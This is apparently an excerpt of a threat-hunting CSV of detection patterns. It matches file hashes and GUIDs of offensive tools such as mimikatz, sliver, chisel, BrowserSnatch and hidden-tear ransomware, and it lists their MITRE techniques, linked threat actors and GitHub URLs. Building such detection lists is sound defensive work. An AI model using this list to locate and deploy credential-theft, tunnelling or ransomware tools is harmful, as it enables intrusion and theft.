"*a33b3ce0aea96a0cd84e504637a7814b713bddbc0dba96765e6a1a0f6c1375db*",".{0,1000}a33b3ce0aea96a0cd84e504637a7814b713bddbc0dba96765e6a1a0f6c1375db.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","32373"
"*a34169885cc3ce7676197b63d907f44dbd7312e33498f7c6701e3d81af69154a*",".{0,1000}a34169885cc3ce7676197b63d907f44dbd7312e33498f7c6701e3d81af69154a.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","32374"
"*a352a6b52e5433a2dc19445287db1537ae6385dc6e1b2b11f53c222b14aae75d*",".{0,1000}a352a6b52e5433a2dc19445287db1537ae6385dc6e1b2b11f53c222b14aae75d.{0,1000}","offensive_tool_keyword","resocks","resocks is a reverse/back-connect SOCKS5 proxy tunnel that can be used to route traffic through a system that can't be directly accessed","T1090.003 - T1090 - T1571","TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/RedTeamPentesting/resocks","1","0","#filehash","N/A","8","10","437","33","2023-09-19T10:43:29Z","2023-05-02T08:42:15Z","32381"
"*a3546da8bf7e18eb991cf72b2d702c6b07997140959f9ef56ba64b2673bbd7fd*",".{0,1000}a3546da8bf7e18eb991cf72b2d702c6b07997140959f9ef56ba64b2673bbd7fd.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","32382"
"*a3596035af9ac517f109f920bde188f2bc80ac1c5b6f282187d8cd5aa5e2e4ea*",".{0,1000}a3596035af9ac517f109f920bde188f2bc80ac1c5b6f282187d8cd5aa5e2e4ea.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","32384"
"*a36223683b1c817d0682ecbee3f3c2d8c60259253dc70969110aed4a3bb4ccfa*",".{0,1000}a36223683b1c817d0682ecbee3f3c2d8c60259253dc70969110aed4a3bb4ccfa.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","32385"
"*a36e3489d4317d70fd2cb100020b0c53d575988b790ec33c4c4d204e5e834016*",".{0,1000}a36e3489d4317d70fd2cb100020b0c53d575988b790ec33c4c4d204e5e834016.{0,1000}","offensive_tool_keyword","SecretServerSecretStealer","Powershell script that decrypts the data stored within a Thycotic Secret Server","T1552 - T1027 - T1059","TA0006","N/A","EvilCorp*","Credential Access","https://github.com/denandz/SecretServerSecretStealer","1","0","#filehash","N/A","10","1","78","14","2020-08-03T06:52:27Z","2017-04-21T04:06:24Z","32386"
"*a36ffb4f22598b5e983ef16251df49deb94ad0c41a8a1768503efe4d7e16ea40*",".{0,1000}a36ffb4f22598b5e983ef16251df49deb94ad0c41a8a1768503efe4d7e16ea40.{0,1000}","offensive_tool_keyword","SharpElevator","SharpElevator is a C# implementation of Elevator for UAC bypass","T1548.002 - T1548","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/eladshamir/SharpElevator","1","0","#filehash","N/A","10","1","51","12","2022-08-31T18:09:10Z","2022-08-29T19:52:53Z","32387"
"*a373aea915dda9f79a2b5467a45a9457cb8595b756ffd56b98c877733e0f14b2*",".{0,1000}a373aea915dda9f79a2b5467a45a9457cb8595b756ffd56b98c877733e0f14b2.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","32389"
"*a3758ea5e899a151d3f5055938dcd9db6aa28c163c2022975f85db8700d48d60*",".{0,1000}a3758ea5e899a151d3f5055938dcd9db6aa28c163c2022975f85db8700d48d60.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","#filehash","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","32390"
"*a37e4ee0bb7651669d595d3bb44edd135f9d696648f36fb9e35af1e84ee6b795*",".{0,1000}a37e4ee0bb7651669d595d3bb44edd135f9d696648f36fb9e35af1e84ee6b795.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","32392"
"*A38C04C7-B172-4897-8471-E3478903035E*",".{0,1000}A38C04C7\-B172\-4897\-8471\-E3478903035E.{0,1000}","offensive_tool_keyword","DiskCryptor","DiskCryptor is an open source encryption solution that offers encryption of all disk partitions including system partitions","T1486 ","TA0040","N/A","N/A","Ransomware","https://github.com/DavidXanatos/DiskCryptor","1","0","#GUIDproject","N/A","10","5","499","108","2024-07-03T10:05:01Z","2019-04-20T14:51:18Z","32393"
"*A38C04C7-B172-4897-8471-E3478903035E*",".{0,1000}A38C04C7\-B172\-4897\-8471\-E3478903035E.{0,1000}","offensive_tool_keyword","DiskCryptor","DiskCryptor is an open source encryption solution that offers encryption of all disk partitions including system partitions","T1486 ","TA0040","N/A","N/A","Ransomware","https://github.com/DavidXanatos/DiskCryptor","1","0","#GUIDproject","N/A","10","5","499","108","2024-07-03T10:05:01Z","2019-04-20T14:51:18Z","32394"
"*a38f6ecc6230b87a0da055351528416f5150c6ec5e1b505043883a142cd36f14*",".{0,1000}a38f6ecc6230b87a0da055351528416f5150c6ec5e1b505043883a142cd36f14.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","32395"
"*a39094b4805dbd909a8450973d690313091cb300d184c8633b0a913942d0fb69*",".{0,1000}a39094b4805dbd909a8450973d690313091cb300d184c8633b0a913942d0fb69.{0,1000}","offensive_tool_keyword","pico","hacker labs - open source and managed web services leveraging SSH","T1021.005 - T1078 - T1105 - T1109 - T1197 - T1213","TA0005 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/picosh/pico","1","0","#filehash","N/A","10","10","1129","36","2025-04-22T17:33:17Z","2022-08-24T03:14:52Z","32396"
"*a398655a-d83f-46bf-8173-3ad16260d970*",".{0,1000}a398655a\-d83f\-46bf\-8173\-3ad16260d970.{0,1000}","offensive_tool_keyword","SharpNBTScan","a NetBIOS scanner. Ghost actors use this tool for hostname and IP address enumeration","T1018 - T1046","TA0007","Ghost Ransomware","N/A","Discovery","https://github.com/BronzeTicket/SharpNBTScan","1","0","#GUIDproject","N/A","7","1","71","4","2021-08-06T05:36:55Z","2021-07-12T08:57:39Z","32398"
"*a3995533605772461060559d6afae9de2726e86ef45a53bb924792fbe9baa325*",".{0,1000}a3995533605772461060559d6afae9de2726e86ef45a53bb924792fbe9baa325.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","32399"
"*a3a0bb972adf5e3a1bcd6684e0569ce704cd46a82570a7fbeb0c8ae8c6dfd65f*",".{0,1000}a3a0bb972adf5e3a1bcd6684e0569ce704cd46a82570a7fbeb0c8ae8c6dfd65f.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","32400"
"*a3acaab0bbd69e3cc51cfaf700d2b320fbcdbdb8afa55b438fc455058fcb9a21*",".{0,1000}a3acaab0bbd69e3cc51cfaf700d2b320fbcdbdb8afa55b438fc455058fcb9a21.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","0","#filehash","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","32402"
"*a3adf686eebbb786431c1df3c1988eb013877596d162ed642fb7e52e285e7296*",".{0,1000}a3adf686eebbb786431c1df3c1988eb013877596d162ed642fb7e52e285e7296.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","#filehash","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","32403"
"*a3af5883965557d84c10d70c96b4f8c559562bf6428cdb10893277918acef863*",".{0,1000}a3af5883965557d84c10d70c96b4f8c559562bf6428cdb10893277918acef863.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","32404"
"*a3afae22698d3cb4d3f9fff03a42ccf61b3666bd6ef5c455ce6488b6788883a3*",".{0,1000}a3afae22698d3cb4d3f9fff03a42ccf61b3666bd6ef5c455ce6488b6788883a3.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","32405"
"*a3b70c73e64ed076672aa098f10baaa91dea2c33283c4aea33a260f9de287cda*",".{0,1000}a3b70c73e64ed076672aa098f10baaa91dea2c33283c4aea33a260f9de287cda.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","32406"
"*a3bf479adb8b6bd523617d51a5c872f86d0a1d2104e63749830b2bd254567d80*",".{0,1000}a3bf479adb8b6bd523617d51a5c872f86d0a1d2104e63749830b2bd254567d80.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","0","#filehash","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","32407"
"*a3bf89c831592b1dd3a093f68a4d4bbc2fa6c4ebb6f2128808d4aa67f81b9269*",".{0,1000}a3bf89c831592b1dd3a093f68a4d4bbc2fa6c4ebb6f2128808d4aa67f81b9269.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043  - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","32408"
"*A3C83F57-6D8F-453A-9559-0D650A95EB21*",".{0,1000}A3C83F57\-6D8F\-453A\-9559\-0D650A95EB21.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-omnibus","1","0","#GUIDproject","N/A","10","3","268","213","2025-04-18T13:17:56Z","2015-02-26T18:42:09Z","32409"
"*a3ca8d72edaf4ffb84a38e88a31f9e537d7d7b76f7cc7966583c7b4b4a811c74*",".{0,1000}a3ca8d72edaf4ffb84a38e88a31f9e537d7d7b76f7cc7966583c7b4b4a811c74.{0,1000}","offensive_tool_keyword","Discord-RAT-2.0","Discord Remote Administration Tool fully written in c#, stub size of ~75kb with over 40 post exploitations modules","T1059.005 - T1105 - T1569.002 - T1027.001","TA0011 - TA0003 - TA0006 - TA0009 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/moom825/Discord-RAT-2.0","1","0","#filehash","N/A","10","10","512","115","2023-11-03T01:15:38Z","2022-07-15T20:09:56Z","32410"
"*a3cb4dc05b5c42059a88e8bce99878c5228bb139b7bd3e2b36588d9ce4968141*",".{0,1000}a3cb4dc05b5c42059a88e8bce99878c5228bb139b7bd3e2b36588d9ce4968141.{0,1000}","offensive_tool_keyword","Gato-X","automate advanced enumeration and exploitation techniques against GitHub repositories and organizations","T1190 - T1083 - T1588 - T1587","TA0001 - TA0007 - TA0005","N/A","N/A","Reconnaissance","https://github.com/adnanekhan/Gato-X","1","0","#filehash","N/A","7","3","270","35","2025-04-21T17:57:09Z","2024-01-27T18:55:16Z","32411"
"*a3db26ef5003ac7b18f143dd6fe3c5ab789cd6cbc908f7cf572d006d9f8bd133*",".{0,1000}a3db26ef5003ac7b18f143dd6fe3c5ab789cd6cbc908f7cf572d006d9f8bd133.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","32412"
"*a3db95daa151cb6ab640f368e1850108099cf94eee2bd2c3fd2789ee83bbcb71*",".{0,1000}a3db95daa151cb6ab640f368e1850108099cf94eee2bd2c3fd2789ee83bbcb71.{0,1000}","offensive_tool_keyword","sish","An open source serveo/ngrok alternative. HTTP(S)/WS(S)/TCP Tunnels to localhost using only SSH","T1572 - T1090.002","TA0010 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antoniomika/sish","1","0","#filehash","N/A","10","10","4203","325","2025-04-10T20:04:08Z","2019-02-15T15:36:23Z","32413"
"*a3e3b811f35d32e87feb85a1a1d0eddc727d712702c584dce1ef0a0878cd1cf2*",".{0,1000}a3e3b811f35d32e87feb85a1a1d0eddc727d712702c584dce1ef0a0878cd1cf2.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","32414"
"*a3ededd9d0451b04eee2d9160448739af710bd5f380322e0b5992e9b64e1e3a5*",".{0,1000}a3ededd9d0451b04eee2d9160448739af710bd5f380322e0b5992e9b64e1e3a5.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","32417"
"*a3ededd9d0451b04eee2d9160448739af710bd5f380322e0b5992e9b64e1e3a5*",".{0,1000}a3ededd9d0451b04eee2d9160448739af710bd5f380322e0b5992e9b64e1e3a5.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","32418"
"*a3fbc9a01ac82d10f92da72625f1a092817c5fad7a9b60917b811fab1ff8c97f*",".{0,1000}a3fbc9a01ac82d10f92da72625f1a092817c5fad7a9b60917b811fab1ff8c97f.{0,1000}","offensive_tool_keyword","BrowserSnatch","steals important data from all chromium and gecko browsers installed in the system and gather the data in a stealer db to be exfiltrated out. A powerful Browser Stealer","T1081 - T1074 - T1114 - T1005 - T1041 - T1027","TA0006 - TA0009 - TA0010","N/A","N/A","Data Exfiltration","https://github.com/shaddy43/BrowserSnatch","1","0","#filehash","N/A","10","3","246","39","2025-03-31T21:04:30Z","2024-08-26T18:38:42Z","32422"
"*A3h1nt/gimmeSH*",".{0,1000}A3h1nt\/gimmeSH.{0,1000}","offensive_tool_keyword","gimmeSH","gimmeSH. is a tool that generates a custom cheatsheet for Reverse Shell. File Transfer and Msfvenom within your terminal. you just need to provide the platform. your Internet protocol address and your port number.","T1059 - T1505","TA0002 - TA0003 - TA0008","N/A","N/A","Exploitation tool","https://github.com/A3h1nt/gimmeSH","1","1","N/A","N/A","N/A","2","183","28","2021-08-27T03:12:15Z","2021-08-02T07:22:15Z","32423"
"*a4045cfd2b84fce0d46096b6dc9f82f8745907b5828a96b522da42cbd5f5563f*",".{0,1000}a4045cfd2b84fce0d46096b6dc9f82f8745907b5828a96b522da42cbd5f5563f.{0,1000}","offensive_tool_keyword","hidden-tear","open source ransomware - many variant in the wild","T1486 - T1059 - T1485 - T1489 - T1070 - T1488","TA0005 - TA0009 - TA0040 - TA0042","N/A","N/A","Ransomware","https://github.com/goliate/hidden-tear","1","0","#filehash","N/A","10","8","765","394","2020-07-08T22:34:01Z","2015-08-19T09:06:51Z","32424"
"*a4058df23cf217a43482e2f6fa20e55ef9005d20713a6860a4974da0fe731e64*",".{0,1000}a4058df23cf217a43482e2f6fa20e55ef9005d20713a6860a4974da0fe731e64.{0,1000}","offensive_tool_keyword","pysecdump","Python-based tool to dump security information from Windows systems","T1003.001 - T1081 - T1012 - T1005 - T1518.001","TA0006 - TA0007 - TA0043","N/A","Dispossessor","Credential Access","https://github.com/pentestmonkey/pysecdump","1","0","#filehash","N/A","10","3","270","49","2020-06-22T04:16:16Z","2013-01-19T18:02:26Z","32425"
"*a4096945fcab171e791efcb38a767d5b532aa93862642f294eea91c934799219*",".{0,1000}a4096945fcab171e791efcb38a767d5b532aa93862642f294eea91c934799219.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","32426"
"*a40d64c15cb551bf428df95586a907b6d0efea97a05afceeac24230fd787ef0f*",".{0,1000}a40d64c15cb551bf428df95586a907b6d0efea97a05afceeac24230fd787ef0f.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","32428"
"*a40ff8a806b8b2c385cd85e3c9627b09fca054a23fe7168aed459098266cab42*",".{0,1000}a40ff8a806b8b2c385cd85e3c9627b09fca054a23fe7168aed459098266cab42.{0,1000}","offensive_tool_keyword","pac2","PAC2 is a framework that generates arbitrary flows and sends and executes them on the Power Automate Platform - using Power automate as a C2","T1550.001 - T1204.002 - T1102 - T1071.001","TA0005 - TA0008 - TA0010- TA0011","N/A","N/A","C2","https://github.com/NTT-Security-Japan/pac2","1","0","#filehash","N/A","6","10","6","1","2024-04-16T11:58:54Z","2024-03-01T08:06:32Z","32429"
"*a41186a797df9bf4cc912835c4226cbb57826693a67e5c5eb4e4eb0b2919843f*",".{0,1000}a41186a797df9bf4cc912835c4226cbb57826693a67e5c5eb4e4eb0b2919843f.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","32430"
"*a41520ae22cf2f079517745389a21e9f90df6376fb61bc4243808f8e494f08b1*",".{0,1000}a41520ae22cf2f079517745389a21e9f90df6376fb61bc4243808f8e494f08b1.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","32432"
"*a41c1b9b2b36e65dc1d8f57a08165289f44ed287893c18146fa32953bc2949fe*",".{0,1000}a41c1b9b2b36e65dc1d8f57a08165289f44ed287893c18146fa32953bc2949fe.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","32435"
"*a421db8d72e7cc2e9d64891c05a49d6a60aed15dc4650f26155aa560f93ecc80*",".{0,1000}a421db8d72e7cc2e9d64891c05a49d6a60aed15dc4650f26155aa560f93ecc80.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043  - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","32436"
"*a425fc824f3bf40f82faad797a69b0fc2556dc79579f566891e75ee00920f7c0*",".{0,1000}a425fc824f3bf40f82faad797a69b0fc2556dc79579f566891e75ee00920f7c0.{0,1000}","offensive_tool_keyword","AV_Evasion_Tool","Undetectable Payload Generator Tool","T1027 - T1036 - T1059 - T1107","TA0005","N/A","N/A","Defense Evasion","https://github.com/1y0n/AV_Evasion_Tool","1","0","#filehash","N/A","10","10","2680","406","2023-12-08T07:38:06Z","2020-04-24T01:11:09Z","32438"
"*a4284269b4058b687af441673ccc1a09dbd013d3dc54546848837ed44e0023af*",".{0,1000}a4284269b4058b687af441673ccc1a09dbd013d3dc54546848837ed44e0023af.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","#filehash","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","32439"
